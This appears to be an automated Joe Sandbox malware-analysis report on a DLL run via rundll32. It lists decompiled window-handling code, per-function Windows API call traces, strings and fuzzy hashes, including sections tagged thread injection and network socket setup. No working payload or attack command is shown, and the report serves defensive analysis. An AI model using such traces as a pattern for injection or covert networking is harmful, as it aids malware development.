                                                                                                                    0x1002a83a
                                                                                                                    0x1002a83f
                                                                                                                    0x1002a842
                                                                                                                    0x1002a847
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a847
                                                                                                                    0x1002a814
                                                                                                                    0x1002a814
                                                                                                                    0x1002a819
                                                                                                                    0x1002a820
                                                                                                                    0x1002a81b
                                                                                                                    0x1002a81b
                                                                                                                    0x1002a81b
                                                                                                                    0x1002a824
                                                                                                                    0x00000000
                                                                                                                    0x1002a826
                                                                                                                    0x1002a82f
                                                                                                                    0x1002a849
                                                                                                                    0x1002a849
                                                                                                                    0x1002a84c
                                                                                                                    0x00000000
                                                                                                                    0x1002a84e
                                                                                                                    0x1002a84e
                                                                                                                    0x1002a851
                                                                                                                    0x1002a853
                                                                                                                    0x1002a853
                                                                                                                    0x1002a856
                                                                                                                    0x1002a857
                                                                                                                    0x1002a85d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a85d
                                                                                                                    0x1002a831
                                                                                                                    0x1002a831
                                                                                                                    0x1002a831
                                                                                                                    0x1002a861
                                                                                                                    0x1002a865
                                                                                                                    0x1002a865
                                                                                                                    0x1002a82f
                                                                                                                    0x1002a824
                                                                                                                    0x1002a800
                                                                                                                    0x1002a800
                                                                                                                    0x1002a80a
                                                                                                                    0x1002a80e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002a80e
                                                                                                                    0x00000000
                                                                                                                    0x1002a7fe
                                                                                                                    0x1002a85f
                                                                                                                    0x1002a85f
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 656273425-0
                                                                                                                    • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                    • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                    • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                    • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E1001DDC0(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E10014B42();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                                    0x1001aa48
                                                                                                                    0x1001aa48
                                                                                                                    0x1001aa4f
                                                                                                                    0x1001aa52
                                                                                                                    0x1001aa5a
                                                                                                                    0x1001aa5d
                                                                                                                    0x1001aa62
                                                                                                                    0x1001aa70
                                                                                                                    0x1001aa82
                                                                                                                    0x1001aa72
                                                                                                                    0x1001aa75
                                                                                                                    0x1001aa75
                                                                                                                    0x1001aa88
                                                                                                                    0x1001aa8c
                                                                                                                    0x1001aa98
                                                                                                                    0x1001aaa0
                                                                                                                    0x1001aaa2
                                                                                                                    0x1001aaa2
                                                                                                                    0x1001aaa0
                                                                                                                    0x1001aa64
                                                                                                                    0x1001aa64
                                                                                                                    0x1001aa64
                                                                                                                    0x1001aa64
                                                                                                                    0x1001aaa4
                                                                                                                    0x1001aab2
                                                                                                                    0x1001aabb
                                                                                                                    0x1001ab5b
                                                                                                                    0x1001ab62
                                                                                                                    0x1001ab69
                                                                                                                    0x1001ab73
                                                                                                                    0x1001aac1
                                                                                                                    0x1001aac3
                                                                                                                    0x1001aac8
                                                                                                                    0x1001aad3
                                                                                                                    0x1001aadc
                                                                                                                    0x1001aadc
                                                                                                                    0x1001aad3
                                                                                                                    0x1001aae0
                                                                                                                    0x1001aae7
                                                                                                                    0x1001ab28
                                                                                                                    0x1001ab37
                                                                                                                    0x1001ab44
                                                                                                                    0x1001aae9
                                                                                                                    0x1001aae9
                                                                                                                    0x1001aaf0
                                                                                                                    0x1001aaf2
                                                                                                                    0x1001aaf2
                                                                                                                    0x1001ab02
                                                                                                                    0x1001ab15
                                                                                                                    0x1001ab1f
                                                                                                                    0x1001ab1f
                                                                                                                    0x1001aae7
                                                                                                                    0x1001ab82
                                                                                                                    0x1001ab87
                                                                                                                    0x1001ab8c
                                                                                                                    0x1001ab90
                                                                                                                    0x1001ab93
                                                                                                                    0x1001ab9a
                                                                                                                    0x1001aba2
                                                                                                                    0x1001abaa
                                                                                                                    0x1001abb2
                                                                                                                    0x1001abb9
                                                                                                                    0x1001abbe
                                                                                                                    0x1001abca
                                                                                                                    0x1001abd2
                                                                                                                    0x1001abd2
                                                                                                                    0x1001abc0
                                                                                                                    0x1001abc0
                                                                                                                    0x1001abc0
                                                                                                                    0x1001abd8
                                                                                                                    0x1001abe7
                                                                                                                    0x1001abef
                                                                                                                    0x1001abef
                                                                                                                    0x1001abda
                                                                                                                    0x1001abda
                                                                                                                    0x1001abda
                                                                                                                    0x1001ac07

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                    • GetParent.USER32(?), ref: 1001AA75
                                                                                                                    • SendMessageA.USER32 ref: 1001AA98
                                                                                                                    • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                    • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                    • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 808654186-3887548279
                                                                                                                    • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                    • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                    • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                    • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 100161DE
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                    • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3191170017-0
                                                                                                                    • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                    • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                    • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                    • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                    • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                    • API String ID: 667068680-3617302793
                                                                                                                    • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                    • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                    • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                    • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                    • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                    • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                    • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                    • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                    • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                      • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1509511306-0
                                                                                                                    • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                    • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                    • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                    • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                      • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                      • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                    • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                    • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                      • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                    • String ID: AfxOldWndProc423
                                                                                                                    • API String ID: 2702501687-1060338832
                                                                                                                    • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                    • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                    • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                    • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                    • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                    • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                    • _printf.LIBCMT ref: 10012F79
                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                    • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                    • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                    • API String ID: 4222005279-2156106531
                                                                                                                    • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                    • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                    • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                    • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                    • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                    • __lock.LIBCMT ref: 10035229
                                                                                                                    • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                    • API String ID: 1036688887-2843748187
                                                                                                                    • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                    • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                    • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                    • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                    • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                    • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                    • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                    • String ID: MS Shell Dlg
                                                                                                                    • API String ID: 1736106359-76309092
